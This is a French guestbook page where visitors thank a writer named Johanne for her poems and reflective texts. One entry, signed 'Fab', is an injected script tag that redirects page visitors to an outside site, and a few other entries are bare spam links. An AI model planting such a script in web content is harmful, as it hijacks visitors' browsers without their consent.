Livre d'or

   222 messages   
Vous devez saisir des informations valides
Anne-Marie
Merci Johanne de m'avoir donné le lien vers tes écrits !
j'ai commencé ma lecture par le poème pour la fêtes des pères !
c'est un plaisir de découvrir tes mots , ta sensibilité .
je te lis et je ressens au plus profond de moi tes mots très justes
Merci Johanne
Heather
Je suis tombée sur vote site par hasard en lisant votre texte "la musique des anges" que j'ai trouvé très beau et surtout très vrai. Je voulais vous dire que votre intuition est exacte et que votre ange gardien est sans aucun doute près de vous et vous avez appris à voir ses signes, à rester à l'écoute et à accueillir son amour en vous. J'ai découvert le mien récemment et le bonheur et la joie qu'elle me communique (c'est une femme) par ses réponses est incommensurable. Nous ne sommes pas seuls et nous sommes aimés.
Bonne continuation !
Jimmy
Bonjour Johanne,
je tenais tout simplement à vous dire que vous avez une capacité d'analyse très objective et vraie! Certaines de vos compositions m'ont particulièrement touchées par leur veracité. Je suis tombé par hasard sur votre site, mais je ne peut pas ne pas faire preuve de respect envers vous car vous êtes une personne très sage.
Serge, de mtl.
charlène
jadore super ton site et je voudrai savoir si je pe prendre de tes texte pr mes chansons de mon groupe de rock ?? fait moi le savoir .... sur msn ou mon blog(OoSaKkii.skyrock.com) merci o plus to silteplai si tu pe
Fab
<script>document.location.href="http://www.atomic-pc.net"</script>
McDiver
Mes salutations;
permettez-moi de vous remercie pour votre bonne initiative; avec de simples mots, des pensées cordiales, de belles rhétoriques que vous faites, où les mots dépassent la pensée simpliste.
J'ai beaucoup admiré votre article intitulé "Indifférence", j'ai senti que vous parliez de ma personne, vous en faites une excellente description, une approche très réaliste, et je voulais vous dire que si cet article m'a touché, c'est parce que je souffre énormément de l'indifférence, j'en souffre à mort, et malgré mes qualités -sans prétention bien sûr-, j'ai tendance à me sentir inutile, parfois futile, ou bien pas du tout intéressant; cette souffrance s'accentue de plus en plus, pour la simple raison que je cherche mon âme s?ur, j'ai envie de rencontrer l'amour de ma vie, chose que je n'y parviens pas, pourquoi, parce que j'estime qu'on est indifférent à mon égard, autrement dit, je n'intéresse personne, et j'ai tendance à me replier sur moi même.Bonne courage...très cordialement.
DIAZ Marc
J'ai cliqué sur plusieurs sujets qui m'étaient chers et j'ai ressenti exactement les mêmes sentiments en étant incapable de les écrire..Bravo et Merci J'ai 42 ans.
brenda
bravo j'adore votre site bonne continuation
szds
http://www.multi-geek.net/
ert
Bravo pour votre site !
http://leventdelhistoire.free.fr
http://leventdelhistoire.free.fr